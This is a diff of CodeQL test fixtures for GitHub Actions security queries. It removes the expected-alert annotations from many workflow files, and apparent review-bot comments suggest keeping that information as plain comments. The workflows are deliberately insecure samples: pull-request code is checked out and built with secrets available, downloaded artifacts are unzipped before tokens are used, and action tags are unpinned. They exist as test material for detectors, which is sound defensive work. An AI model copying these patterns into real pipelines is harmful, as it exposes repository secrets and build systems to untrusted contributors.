--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -33,9 +33,9 @@ jobs: # For PRs make sure to checkout the PR branch ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - name: Setup Pages uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll # $ Alert[actions/unversioned-immutable-action] + - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ @@ -44,7 +44,7 @@ jobs: # Automatically uploads an artifact from the './_site' directory by default uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 # Deployment job - deploy: # $ Alert[actions/unversioned-immutable-action] + deploy: environment: name: 'Pages Preview' url: ${{ steps.deployment.outputs.page_url }} @@ -60,4 +60,4 @@ jobs: id: deployment uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 with: - preview: 'true' # $ Alert[actions/unversioned-immutable-action] + preview: 'true' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml index 9ecc8c2367bb..5501beb9ea2f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml 
@@ -39,12 +39,12 @@ jobs: with: ref: ${{ steps.branch-deploy.outputs.ref }} - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 # $ Alert[actions/untrusted-checkout/critical] + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 if: ${{ steps.branch-deploy.outputs.continue == 'true' }} with: bundler-cache: true - - name: bootstrap # $ Sink[actions/untrusted-checkout/critical] + - name: bootstrap if: ${{ steps.branch-deploy.outputs.continue == 'true' }} run: script/bootstrap @@ -55,4 +55,4 @@ jobs: set -o pipefail script/deploy | tee deploy.out bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out # $ Sink[actions/untrusted-checkout/critical] + rm deploy.out diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml index 39fc63beb3f9..4d5ae1f528cd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout # $ Alert[actions/untrusted-checkout/medium] + - name: Checkout if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml index a89f4ef3031f..061ff7d02c5e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml 
@@ -57,7 +57,7 @@ jobs: - name: checkout uses: actions/checkout@v3 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} - - uses: amannn/action-semantic-pull-request@v5 # $ Alert[actions/unpinned-tag] + - uses: amannn/action-semantic-pull-request@v5 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} with: requireScope: false @@ -106,7 +106,7 @@ jobs: persist-credentials: false submodules: false lfs: true - - uses: actionsdesk/lfs-warning@v3.2 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] + - uses: actionsdesk/lfs-warning@v3.2 name: lfs-warning with: labelName: lfs-detected! @@ -141,11 +141,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] + - uses: cachix/install-nix-action@v20 with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] - - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable @@ -219,12 +219,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha }} persist-credentials: false - - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] + - name: Build all packages if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-outputs - - id: ok # $ Sink[actions/untrusted-checkout/critical] + - id: ok run: echo "ok=true" >> "$GITHUB_OUTPUT" build-all-checks-packages: 
@@ -253,12 +253,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] + - name: Build all packages if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-checks - - id: ok # $ Sink[actions/untrusted-checkout/critical] + - id: ok run: echo "ok=true" >> "$GITHUB_OUTPUT" @@ -287,12 +287,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: build-all-deps-packages # $ Alert[actions/untrusted-checkout/critical] + - name: build-all-deps-packages if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-deps - - id: ok # $ Sink[actions/untrusted-checkout/critical] + - id: ok run: echo "ok=true" >> "$GITHUB_OUTPUT" draft-release-check: @@ -344,7 +344,7 @@ jobs: with: fetch-depth: 0 - name: Login to DockerHub - uses: docker/login-action@v2 # $ Alert[actions/unpinned-tag] + uses: docker/login-action@v2 with: username: ${{ secrets.DOCKER_HUB_USERNAME }} password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} @@ -353,7 +353,7 @@ jobs: nix run .#generate-release-artifacts --print-build-logs - name: Release artifacts - uses: softprops/action-gh-release@v1 # $ Alert[actions/unpinned-tag] + uses: softprops/action-gh-release@v1 with: draft: true prerelease: false 
@@ -388,11 +388,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] + - name: Build all packages uses: "./.github/templates/watch-exec" with: command: nix -- build .#all - - name: Publish cmc-api to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish cmc-api to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-cmc-api.tar.gz @@ -401,7 +401,7 @@ jobs: name: cmc-api artifact: cmc-api:latest - - name: Publish devnet-xc to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish devnet-xc to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-devnet-xc.tar.gz @@ -411,7 +411,7 @@ jobs: artifact: devnet-xc:latest tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} - - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz @@ -420,7 +420,7 @@ jobs: name: hyperspace-composable-rococo-picasso-rococo artifact: hyperspace-composable-rococo-picasso-rococo:latest - - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub # $ Sink[actions/untrusted-checkout/critical] + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz @@ -429,7 +429,7 @@ jobs: name: hyperspace-composable-polkadot-picasso-kusama artifact: hyperspace-composable-polkadot-picasso-kusama:latest - mantis-e2e: # $ Sink[actions/untrusted-checkout/critical] + mantis-e2e: name: mantis-e2e outputs: ok: ${{ steps.ok.outputs.ok }} 
@@ -446,11 +446,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] + - uses: cachix/install-nix-action@v20 with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] - - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml index 54f740735e25..d8381176fd23 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -17,7 +17,7 @@ jobs: ref: ${{ github.head_ref }} token: ${{ secrets.DOCUBOT_REPO_PAT }} - - run: | # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - run: | ./cmd env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml index 407659f09db5..72db8c29370d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml 
@@ -17,7 +17,7 @@ jobs: GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - if: github.event_name == 'workflow_run' # $ Alert[actions/unversioned-immutable-action] + - if: github.event_name == 'workflow_run' uses: ./.github/actions/download-artifact - id: resolve-step env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml index b338fbc5f16b..3b8a6d6dd62a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | # $ Alert[actions/untrusted-checkout/critical] + - run: | npm install npm run lint - # $ Sink[actions/untrusted-checkout/critical] + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml index 8bdb8fc75ede..e8b5466f7516 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -22,12 +22,12 @@ jobs: with: ref: ${{ github.event.after || github.event.pull_request.head.sha }} - - name: Build # $ Alert[actions/untrusted-checkout/critical] + - name: Build working-directory: custom-payment-flow/client/android-kotlin run: | ./gradlew build - dependabot-auto-merge: # $ Sink[actions/untrusted-checkout/critical] + dependabot-auto-merge: if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} needs: android_build permissions: 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml index 448654fe45d8..16bb6bf876c3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -87,8 +87,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] + - name: Environment setup uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Sink[actions/untrusted-checkout/critical] + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml index 9f0ee5cf96d9..878b83779613 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -89,7 +89,7 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup # $ Alert[actions/unversioned-immutable-action] + - name: Environment setup uses: ./.github/actions/setup-env with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml index c8a68d73e588..0a73e86d5fc6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml 
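Review bot: With the markers removed from the `Environment setup` step in test11.yml, nothing in the fixture records that this step was expected to raise `actions/untrusted-checkout/critical`, whereas the near-identical step in test12.yml (the next hunk) was annotated only with `actions/unversioned-immutable-action`. That contrast is presumably why the two fixtures sit side by side, and after this change it can only be recovered by comparing the `.expected` files. I would keep it as an ordinary trailing comment, for example `- name: Environment setup # expected: untrusted-checkout/critical` here and `- name: Environment setup # expected: no untrusted-checkout alert` in test12.yml. A trailing comment adds no line, so the recorded locations should not move, though that is worth confirming with a test run. Both jobs begin outside their hunks, so the condition that separates the two cases is not visible here.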
@@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check repository permission for user - uses: sushichop/action-repository-permission@v2 # $ Alert[actions/unpinned-tag] + uses: sushichop/action-repository-permission@v2 with: required-permission: write reaction-permitted: rocket @@ -22,7 +22,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/head fetch-depth: 0 - - uses: actions/setup-node@v3 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/setup-node@v3 with: node-version: 16 - name: Danger JS diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml index 15ab46cc70a1..6f03a0e966a1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -102,13 +102,13 @@ jobs: if: contains(github.event.comment.body, '/rollback') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - - name: Checkout PR branch # $ Alert[actions/unversioned-immutable-action] + - name: Checkout PR branch if: contains(github.event.comment.body, '/deploy') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment # $ Alert[actions/unversioned-immutable-action] + - name: Get environment from comment id: environment shell: bash env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml index ef42bbb4a3c5..0be96a4140ef 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml 
@@ -62,7 +62,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI # $ Alert[actions/unversioned-immutable-action] + - name: Install GH CLI uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -112,7 +112,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure # $ Alert[actions/unversioned-immutable-action] + - name: Log into Azure uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml index d5de91480cb1..f679b772e340 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -16,8 +16,8 @@ jobs: ref: ${{ github.event.workflow_run.head_branch }} fetch-depth: 0 - - name: SonarCloud Scan # $ Alert[actions/untrusted-checkout/critical] - uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/untrusted-checkout/critical] + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml index 96de593004ab..6347db51e3c9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml 
@@ -30,12 +30,12 @@ jobs: let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); - - name: Unzip artifacts # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip artifacts run: unzip rsc-pr-build-artifacts.zip - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] + uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/artifact-poisoning/critical] + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml index 4cf7a49245c2..2f3b0bb876f6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -59,4 +59,4 @@ jobs: with: ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} - - run: ./bin/build-plugin-zip.sh # $ Alert[actions/unversioned-immutable-action] + - run: ./bin/build-plugin-zip.sh diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml index 1404c559b0a8..c825cc73813b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -29,7 +29,7 @@ jobs: run-id: ${{ github.event.workflow_run.id }} # Don't fail a build if the file doesn't exist continue-on-error: true - - name: Extract previously uploaded build scan content # $ Alert[actions/artifact-poisoning/critical] + - name: Extract previously uploaded build scan content if: ${{ steps.downloadBuildScan.outcome != 'failure'}} run: tar -xzf build-scan.tgz -C ~ - name: Publish 
@@ -37,6 +37,6 @@ jobs: # Don't fail a build if publishing fails continue-on-error: true run: | - ./gradlew buildScanPublishPrevious # $ Sink[actions/artifact-poisoning/critical] + ./gradlew buildScanPublishPrevious env: ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml index 9b7a6c535c61..b1d776ef6c8a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -18,5 +18,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ inputs.git_ref }} - - run: | # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] - ./cmd # $ Sink[actions/untrusted-checkout/critical] + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml index 16d84cd70f73..5f67fecc09a5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -17,4 +17,4 @@ jobs: - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 with: ref: ${{ github.head_ref }} - - run: make foo # $ Alert[actions/unversioned-immutable-action] + - run: make foo diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml index afbb3f0a433a..cc7f71a7b3e4 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml 
@@ -11,11 +11,11 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 0 - - uses: actions/github-script@v5 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/github-script@v5 with: github-token: ${{secrets.GITHUB_TOKEN}} script: | const { foo } = require('./foo'); - # $ Sink[actions/untrusted-checkout/critical] + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml index 8c45b9f89303..d9aa2973e007 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm install # $ Alert[actions/untrusted-checkout/medium] + - run: npm install working-directory: scripts/github-actions/semantic-pull-request/ - name: Lint PR Title if: github.event_name == 'pull_request_target' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index 5d143bb3f859..f82f493cd6e0 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout # $ Alert[actions/untrusted-checkout/medium] + - name: Checkout if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 99b3c1d49008..7a346a897e45 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -21,8 +21,8 @@ jobs: persist-credentials: false ref: refs/pull/${{ github.event.issue.number }}/head - - name: Setup PNPM # $ Alert[actions/untrusted-checkout/critical] - uses: pnpm/action-setup@v3 # $ Alert[actions/unpinned-tag] + - name: Setup PNPM + uses: pnpm/action-setup@v3 - name: Setup Node uses: actions/setup-node@v4 @@ -33,10 +33,10 @@ jobs: - name: Install dependencies run: pnpm install - - name: Build Packages # $ Sink[actions/untrusted-checkout/critical] + - name: Build Packages run: pnpm run build - - name: Get bench command # $ Sink[actions/untrusted-checkout/critical] + - name: Get bench command id: bench-command env: # protects from untrusted user input and command injection @@ -56,5 +56,5 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash - - run: python2.7 foo.py # $ Sink[actions/untrusted-checkout/critical] - - run: pip install --no-deps . # $ Sink[actions/untrusted-checkout/critical] + - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml index bb28d082ac57..381cc16a6d16 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml 
@@ -23,7 +23,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - name: Generate openapi.json # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - name: Generate openapi.json run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" publish-unstable: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml index 2c8007b99846..6f7ff665be3b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -13,6 +13,6 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - run: # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] + - run: sed -f script/config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml index eef43d011d4c..6e7612144bcc 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml 
@@ -7,13 +7,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: foo/bar - - uses: foo/bar@v1 # $ Alert[actions/unpinned-tag] + - uses: foo/bar@v1 - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb - - uses: docker://foo/bar@latest # $ Alert[actions/unpinned-tag] + - uses: docker://foo/bar@latest - uses: docker://foo/bar@sha256:887a259a5a534f3c4f36cb02dca341673c6089431057242cdc931e9f133147e9 # SHA-256 pinned (64 hex chars) - should NOT be flagged - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb25b062c917b0c75f8b47d84d # SHA-1 pinned (40 hex chars) regression - should NOT be flagged - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 # Invalid 50-char hex string - should be flagged - - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 # $ Alert[actions/unpinned-tag] + - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 5119b7384ea2..15d4813c40e9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -8,14 +8,14 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install npm run lint - test2: # $ Sink[actions/untrusted-checkout/critical] + test2: runs-on: ubuntu-latest env: HEAD: ${{ github.event.pull_request.head.sha }} 
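Review bot: In the unpinned_tags.yml hunk, `foo/bar@v1` and `docker://foo/bar@latest` lose their `# $ Alert[actions/unpinned-tag]` markers and are left with no indication that they are the positive cases, while the hex-ref cases below them keep their plain "should be flagged" / "should NOT be flagged" comments. The 50-character hex ref still has its explanatory comment on the line above, so only the two mutable-tag steps become undocumented. I would give them a trailing comment in the same wording, e.g. `- uses: foo/bar@v1 # mutable tag - should be flagged` and `- uses: docker://foo/bar@latest # mutable tag - should be flagged`, so the pinned/unpinned boundary this fixture exercises stays readable without opening the `.expected` file. A trailing comment adds no line, so the expected locations should be unaffected, but a test run should confirm that.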
